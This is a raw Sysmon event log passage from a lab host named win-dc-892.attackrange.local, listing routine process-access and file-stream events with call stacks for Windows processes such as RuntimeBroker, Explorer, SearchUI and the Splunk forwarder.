12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=7A8AC65F0F6EB921AEB563EFAEC8909F,SHA256=A92EF78697E3A7AC06CC023453399E4C80ED9B953B0C2E06C8DF553AAB6D4C08,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000010801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000010800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C5-6064-A500-00000000AE01}43564280C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C5-6064-A500-00000000AE01}43564280C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.739{266CAFBE-64C4-6064-9B00-00000000AE01}49244480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\ole32.dll+40d9|C:\Windows\System32\ole32.dll+7fb2e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+566aa|C:\Windows\System32\combase.dll+56851|C:\Windows\System32\combase.dll+56e26|C:\Windows\System32\combase.dll+c3aef|C:\Windows\System32\combase.dll+48c73 10341000x800000000000000010795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.739{266CAFBE-64C4-6064-9B00-00000000AE01}49244480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\ole32.dll+80e96|C:\Windows\System32\ole32.dll+7fafa|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+566aa|C:\Windows\System32\combase.dll+56851|C:\Windows\System32\combase.dll+56e26|C:\Windows\System32\combase.dll+c3aef|C:\Windows\System32\combase.dll+48c73 23542300x800000000000000010794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.520{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B934B295A15F74582AA4242AF3036A8,SHA256=16B7E315E240D92FFD4158EF593E0B2F4F78829C8D5C55C90FB20D27508ED1BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.489{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D30FBCF365619DFBBAE056FB119CA7A,SHA256=BEC4D9F060DE5C83EE467F2E3D145FA373FAC886F865DA147EB43DC43B4A7204,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.411{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000010791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.411{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000010790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.411{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000010789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.411{266CAFBE-64C4-6064-9B00-00000000AE01}49243560C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a2f8d|C:\Windows\System32\Windows.Storage.dll+f5a73|C:\Windows\System32\Windows.Storage.dll+f5aea|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000010788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.411{266CAFBE-64C4-6064-9B00-00000000AE01}49243560C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca332|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5356|C:\Windows\System32\Windows.Storage.dll+2a2eef|C:\Windows\System32\Windows.Storage.dll+f5a73|C:\Windows\System32\Windows.Storage.dll+f5aea|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x800000000000000010787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.395{266CAFBE-64C4-6064-9B00-00000000AE01}49243560C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c63|C:\Windows\System32\Windows.Storage.dll+e73d5|C:\Windows\System32\Windows.Storage.dll+e72e9|C:\Windows\System32\Windows.Storage.dll+e7282|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfc6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x800000000000000010786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.395{266CAFBE-64C4-6064-9B00-00000000AE01}49243560C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfc6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows